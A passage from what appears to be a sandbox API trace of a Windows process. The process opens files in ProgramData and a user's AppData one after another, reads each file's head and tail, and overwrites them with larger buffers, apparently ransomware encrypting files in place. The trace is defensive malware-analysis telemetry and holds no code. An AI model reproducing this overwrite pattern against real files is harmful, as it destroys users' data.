lpNumberOfBytesWritten=0x2b1f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0136.401] CloseHandle (hObject=0x1f0) returned 1 [0136.401] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.403] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.403] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x15e [0136.403] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.403] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.403] ReleaseMutex (hMutex=0x168) returned 1 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0136.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0136.403] ReadFile (in: hFile=0x1f0, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x2b1f2bc*=0x15e, lpOverlapped=0x0) returned 1 [0136.405] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.405] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6e6, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6e6, lpOverlapped=0x0) returned 1 [0136.405] CloseHandle (hObject=0x1f0) returned 1 [0136.406] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.406] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.406] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x152 [0136.407] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.407] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.407] ReleaseMutex (hMutex=0x168) returned 1 [0136.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0136.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.SETLANG.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0136.407] ReadFile (in: hFile=0x1f0, lpBuffer=0x268af88, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268af88*, lpNumberOfBytesRead=0x2b1f2bc*=0x152, lpOverlapped=0x0) returned 1 [0136.408] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.408] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6da, lpOverlapped=0x0) returned 1 [0136.408] CloseHandle (hObject=0x1f0) returned 1 [0136.409] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x152 [0136.410] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.410] ReleaseMutex (hMutex=0x168) returned 1 [0136.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0136.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0136.410] ReadFile (in: hFile=0x1f0, lpBuffer=0x268af88, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268af88*, lpNumberOfBytesRead=0x2b1f2bc*=0x152, lpOverlapped=0x0) returned 1 [0136.411] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.411] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2b1f2d0*=0x6da, lpOverlapped=0x0) returned 1 [0136.411] CloseHandle (hObject=0x1f0) returned 1 [0136.411] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6f428 [0136.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.413] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.413] ReleaseMutex (hMutex=0x168) returned 1 [0136.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x86.exe", lpUsedDefaultChar=0x0) returned 16 [0136.413] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.469] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6e428 [0136.469] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.508] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6e428 [0136.508] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.509] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.509] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.509] CloseHandle (hObject=0x1f0) returned 1 [0136.509] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x23000 [0136.514] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.514] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.514] ReleaseMutex (hMutex=0x168) returned 1 [0136.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0136.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0136.514] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.545] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0136.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.583] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0136.583] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.584] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.584] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.584] CloseHandle (hObject=0x1cc) returned 1 [0136.632] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.634] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.634] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x25000 [0136.634] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.634] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.634] ReleaseMutex (hMutex=0x168) returned 1 [0136.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0136.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0136.634] ReadFile (in: hFile=0x208, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.658] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x24000 [0136.658] ReadFile (in: hFile=0x208, lpBuffer=0x1ea4988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4988*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.890] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x24000 [0136.890] WriteFile (in: hFile=0x208, lpBuffer=0x2872188*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872188*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.890] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.891] WriteFile (in: hFile=0x208, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.891] CloseHandle (hObject=0x208) returned 1 [0136.891] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.893] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.893] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x23000 [0136.894] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.894] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.894] ReleaseMutex (hMutex=0x168) returned 1 [0136.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0136.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0136.894] ReadFile (in: hFile=0x208, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.959] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0136.959] ReadFile (in: hFile=0x208, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.704] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0137.705] WriteFile (in: hFile=0x208, lpBuffer=0x25abb78*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25abb78*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0137.705] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0137.705] WriteFile (in: hFile=0x208, lpBuffer=0x2890978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2890978*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0137.706] CloseHandle (hObject=0x208) returned 1 [0137.824] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0137.825] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.825] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x23000 [0137.826] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.826] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.826] ReleaseMutex (hMutex=0x168) returned 1 [0137.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0137.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fd5c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0137.826] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0137.838] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0137.838] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.867] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x22000 [0137.868] WriteFile (in: hFile=0x1cc, lpBuffer=0x2872188*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872188*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0137.868] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0137.868] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0137.869] CloseHandle (hObject=0x1cc) returned 1 [0137.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0137.870] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.870] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 